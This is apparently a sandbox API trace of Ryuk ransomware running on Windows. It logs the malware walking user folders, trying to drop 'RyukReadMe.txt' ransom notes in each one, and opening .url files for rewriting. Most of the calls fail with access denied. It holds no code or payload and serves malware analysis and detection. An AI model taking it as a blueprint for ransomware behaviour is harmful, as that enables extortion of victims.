[0159.993] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.993] SetLastError (dwErrCode=0x0) [0159.993] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.993] GetLastError () returned 0x5 [0159.993] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.993] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0159.994] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.994] SetLastError (dwErrCode=0x0) [0159.994] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\my music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.002] GetLastError () returned 0x5 [0160.002] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.002] SetLastError (dwErrCode=0x0) [0160.002] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.002] GetLastError () returned 0x5 [0160.002] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.002] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0160.002] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.002] SetLastError (dwErrCode=0x0) [0160.002] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.003] GetLastError () returned 0x5 [0160.003] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.003] SetLastError (dwErrCode=0x0) [0160.003] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.003] GetLastError () returned 0x5 [0160.003] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.003] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0160.003] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.003] SetLastError (dwErrCode=0x0) [0160.003] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\my videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.003] GetLastError () returned 0x5 [0160.003] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.003] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.004] SetLastError (dwErrCode=0x0) [0160.004] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\default\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.007] GetLastError () returned 0x5 [0160.007] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.007] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.007] SetLastError (dwErrCode=0x0) [0160.007] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.007] GetLastError () returned 0x5 [0160.007] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.007] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.007] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.007] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.008] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.008] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.008] SetLastError (dwErrCode=0x0) [0160.008] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\RyukReadMe.txt" (normalized: "c:\\users\\default\\downloads\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.008] GetLastError () returned 0x5 [0160.008] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.008] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.008] SetLastError (dwErrCode=0x0) [0160.008] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.008] GetLastError () returned 0x5 [0160.008] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.008] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.008] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.010] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.010] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.010] SetLastError (dwErrCode=0x0) [0160.010] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.010] GetLastError () returned 0x5 [0160.010] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.010] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.010] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.010] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.010] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.010] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.010] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 0 [0160.011] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.011] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.011] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.011] SetLastError (dwErrCode=0x0) [0160.011] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\links\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.011] GetLastError () returned 0x5 [0160.011] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.011] SetLastError (dwErrCode=0x0) [0160.011] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.011] GetLastError () returned 0x5 [0160.011] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.011] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.013] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.013] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.013] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 0 [0160.014] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.014] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.014] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.014] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 0 [0160.014] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.015] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.015] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 0 [0160.015] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.016] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.016] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 0 [0160.016] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.016] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.017] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 0 [0160.017] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.017] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.017] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.017] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.017] SetLastError (dwErrCode=0x0) [0160.017] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.020] GetLastError () returned 0x5 [0160.020] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.020] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.020] SetLastError (dwErrCode=0x0) [0160.020] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.020] GetLastError () returned 0x5 [0160.020] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.020] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.020] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.022] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.022] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.022] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 0 [0160.022] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.022] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.023] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 0 [0160.023] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.023] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.023] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 0 [0160.023] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.024] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.024] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 0 [0160.024] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.024] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.025] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.025] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 0 [0160.025] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.025] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.025] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.026] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 0 [0160.026] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.026] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.026] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.027] SetLastError (dwErrCode=0x0) [0160.027] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.030] GetLastError () returned 0x5 [0160.030] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0160.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.030] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.030] SetLastError (dwErrCode=0x0) [0160.030] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\default\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.030] GetLastError () returned 0x5 [0160.030] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.030] SetLastError (dwErrCode=0x0) [0160.030] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.030] GetLastError () returned 0x5 [0160.030] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.030] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.037] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.037] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.037] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.038] SetLastError (dwErrCode=0x0) [0160.038] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\RyukReadMe.txt" (normalized: "c:\\users\\default\\links\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.040] GetLastError () returned 0x5 [0160.040] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.040] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.041] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.041] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.042] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.042] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 